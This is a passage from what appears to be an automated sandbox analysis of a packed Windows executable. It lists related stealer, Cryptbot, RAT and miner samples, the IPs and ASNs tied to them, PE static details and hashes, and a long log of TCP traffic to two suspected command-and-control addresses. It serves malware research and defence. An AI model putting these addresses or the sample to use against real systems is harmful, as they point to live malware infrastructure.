                                                    W6seF0MjGW.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                    • 34.226.108.155
                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                    • 34.226.108.155
                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                    • 98.85.100.80
                                                    home.twentytk20pn.toprJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 194.87.47.113
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                    • 185.185.71.170
                                                    aweqG2ssAY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 185.185.71.170
                                                    EnoSY3z6MP.exeGet hashmaliciousCryptbotBrowse
                                                    • 185.185.71.170
                                                    vH7JfdNi3c.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 185.185.71.170
                                                    JiZQEd33mn.exeGet hashmaliciousUnknownBrowse
                                                    • 185.185.71.170

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    TWC-11351-NORTHEASTUSSh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                                    • 98.85.100.80
                                                    rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 98.85.100.80
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    W6seF0MjGW.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    f1842FwKth.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    aweqG2ssAY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    vH7JfdNi3c.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    U6mwWZlkzH.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    KzLv0EXDs1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    ASBAXETNRUrJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 194.87.47.113
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    17345062850621022e2a034193497843f70f72ad0e2a6d5b0e23bb6cd0de4c41fac1759029833.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                    • 45.135.232.38
                                                    H6Lzd3cP3H.exeGet hashmaliciousUnknownBrowse
                                                    • 194.87.47.99
                                                    k4c3YnjoBr.exeGet hashmaliciousCryptbotBrowse
                                                    • 194.87.47.99
                                                    1SzdrH2oTL.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.99
                                                    b3astmode.arm5.elfGet hashmaliciousMiraiBrowse
                                                    • 91.193.216.252

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    No created / dropped files found

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Entropy (8bit):7.983831092703381
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • VXD Driver (31/22) 0.00%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:wlEp68Few5.exe
                                                    File size:4'474'880 bytes
                                                    MD5:8cd346fc831e7d59ebab0de045018b84
                                                    SHA1:65ecbe74b5e512c9b00dbb0d041ac1f812f3cbb5
                                                    SHA256:ca2b0a34c077e6e81cde2626da1aca4de3f52190747d4f66636a0a8397e158c5
                                                    SHA512:6708a808b9300845e5852f25a380abf1ce807d96695256793c7a80ebc08307f21a6ba38bc0d73c2897c46ad2828f80717ad2f79c585c658324c7b887bf797912
                                                    SSDEEP:98304:HYd0UZJxaPAlwK5/4ZGpF1NfrV/qHFAUrIYkO7lVT7T:HYZJOxK5wZGJNp/gAfYln
                                                    TLSH:AF26336C2AB3D58DFBA1683A6FCB1B40682019F2C6E79C516D05EBFF194E51E17C13A0
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@...................................D...@... ............................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0xf6b000
                                                    Entrypoint Section:.taggant
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                    DLL Characteristics:DYNAMIC_BASE
                                                    Time Stamp:0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp 00007F6F944FF4DAh

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x61905f0x73.idata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x6180000x2b0.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb697e00x10vwhakcfb
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0xb697900x18vwhakcfb
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    0x10000x6170000x283e00f2f769665fc7f70670e8bf7d115f0118unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x6180000x2b00x20040d4917ae009f1cd9a671bc7a1902a98False0.794921875data6.050616596482934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .idata 0x6190000x10000x200e8fbf92e0939d0cd4935f0fe539e974dFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    0x61a0000x3930000x200d25e1e6caaf3c73497fdc30c7f11d82cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    vwhakcfb0x9ad0000x1bd0000x1bcc005938c5912147d610a631d0b6df923be7False0.9944798693086003data7.956697617870847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    nubvuqgg0xb6a0000x10000x6003d1504aa57dafcafee658e6c78c5d5aeFalse0.5833333333333334data5.090714072879632IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .taggant0xb6b0000x30000x22009ccc7ce379b007c8be66e6145462c05cFalse0.06433823529411764DOS executable (COM)0.7590613508815471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_MANIFEST0xb697f00x256ASCII text, with CRLF line terminators0.5100334448160535

                                                    Imports

                                                    DLLImport
                                                    kernel32.dlllstrcpy

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 19, 2024 08:33:28.331934929 CET49721443192.168.2.998.85.100.80
                                                    Dec 19, 2024 08:33:28.331988096 CET4434972198.85.100.80192.168.2.9
                                                    Dec 19, 2024 08:33:28.332066059 CET49721443192.168.2.998.85.100.80
                                                    Dec 19, 2024 08:33:28.345192909 CET49721443192.168.2.998.85.100.80
                                                    Dec 19, 2024 08:33:28.345213890 CET4434972198.85.100.80192.168.2.9
                                                    Dec 19, 2024 08:33:30.080733061 CET4434972198.85.100.80192.168.2.9
                                                    Dec 19, 2024 08:33:30.114648104 CET49721443192.168.2.998.85.100.80
                                                    Dec 19, 2024 08:33:30.114665985 CET4434972198.85.100.80192.168.2.9
                                                    Dec 19, 2024 08:33:30.116813898 CET4434972198.85.100.80192.168.2.9
                                                    Dec 19, 2024 08:33:30.116893053 CET49721443192.168.2.998.85.100.80
                                                    Dec 19, 2024 08:33:30.132061005 CET49721443192.168.2.998.85.100.80
                                                    Dec 19, 2024 08:33:30.132158041 CET4434972198.85.100.80192.168.2.9
                                                    Dec 19, 2024 08:33:30.132342100 CET49721443192.168.2.998.85.100.80
                                                    Dec 19, 2024 08:33:30.132349014 CET4434972198.85.100.80192.168.2.9
                                                    Dec 19, 2024 08:33:30.180584908 CET49721443192.168.2.998.85.100.80
                                                    Dec 19, 2024 08:33:30.865958929 CET4434972198.85.100.80192.168.2.9
                                                    Dec 19, 2024 08:33:30.866096020 CET4434972198.85.100.80192.168.2.9
                                                    Dec 19, 2024 08:33:30.866194963 CET49721443192.168.2.998.85.100.80
                                                    Dec 19, 2024 08:33:30.885343075 CET49721443192.168.2.998.85.100.80
                                                    Dec 19, 2024 08:33:30.885373116 CET4434972198.85.100.80192.168.2.9
                                                    Dec 19, 2024 08:33:31.999788046 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.119369030 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.119523048 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.120551109 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.240380049 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.240395069 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.240405083 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.240408897 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.240412951 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.240420103 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.240498066 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.240508080 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.240535975 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.240546942 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.240602016 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.240669012 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.360191107 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.360204935 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.360239029 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.360271931 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.360286951 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.360320091 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.360332012 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.360363007 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.360373020 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.360441923 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.401027918 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.401257038 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.521047115 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.521186113 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.565797091 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.565958023 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.684958935 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.685060978 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.777282953 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.777427912 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:32.897094011 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:32.897142887 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.131217003 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.131495953 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.131593943 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.252484083 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.252523899 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.252557993 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.252588034 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.252614975 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.252613068 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.252646923 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.252675056 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.252706051 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.255434036 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.255465984 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.255497932 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.255501986 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.255527020 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.255534887 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.255557060 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.255557060 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.255584955 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.255620003 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.256486893 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.256556034 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.258233070 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258285046 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258316040 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258332014 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.258346081 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258351088 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.258373976 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.258373976 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258404970 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258433104 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258461952 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258495092 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258522987 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258550882 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258579016 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258606911 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258635044 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258663893 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258692980 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258721113 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258750916 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258779049 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258812904 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258840084 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258867025 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258894920 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258922100 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258953094 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.258984089 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.259272099 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.259356022 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.259356022 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.259393930 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.297929049 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.298104048 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.372386932 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.372493982 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.372582912 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.372663021 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.372833014 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.372880936 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.372906923 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.372953892 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.375186920 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.375261068 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.375293970 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.375375032 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.375384092 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.375443935 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.375488997 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.375550032 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.375638962 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.375669003 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.375725031 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.376137972 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.376205921 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.376342058 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.376410961 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.378562927 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.378642082 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.378665924 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.378695965 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.378727913 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.378746986 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.378747940 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.378777981 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.378814936 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.378828049 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.378889084 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.378918886 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.378957033 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.378985882 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.379080057 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.379137039 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.379139900 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.379201889 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.379231930 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.379295111 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.379338026 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.379388094 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.379403114 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.379425049 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.379452944 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.379491091 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.379539013 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.379571915 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.379623890 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.379650116 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.379724979 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.379745960 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.379811049 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.379812956 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.379842043 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.379868031 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.379898071 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.379945993 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.379997015 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380006075 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380059004 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380065918 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380129099 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380204916 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380234957 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380260944 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380263090 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380285978 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380322933 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380323887 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380353928 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380390882 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380404949 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380418062 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380438089 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380466938 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380489111 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380492926 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380517960 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380564928 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380582094 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380697012 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380727053 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380764008 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380774975 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380789042 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380825043 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380853891 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380858898 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380877972 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380912066 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380923033 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380986929 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381006002 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381064892 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381074905 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381105900 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381133080 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381158113 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381160975 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381186008 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381217003 CET4973280192.168.2.9194.87.47.113
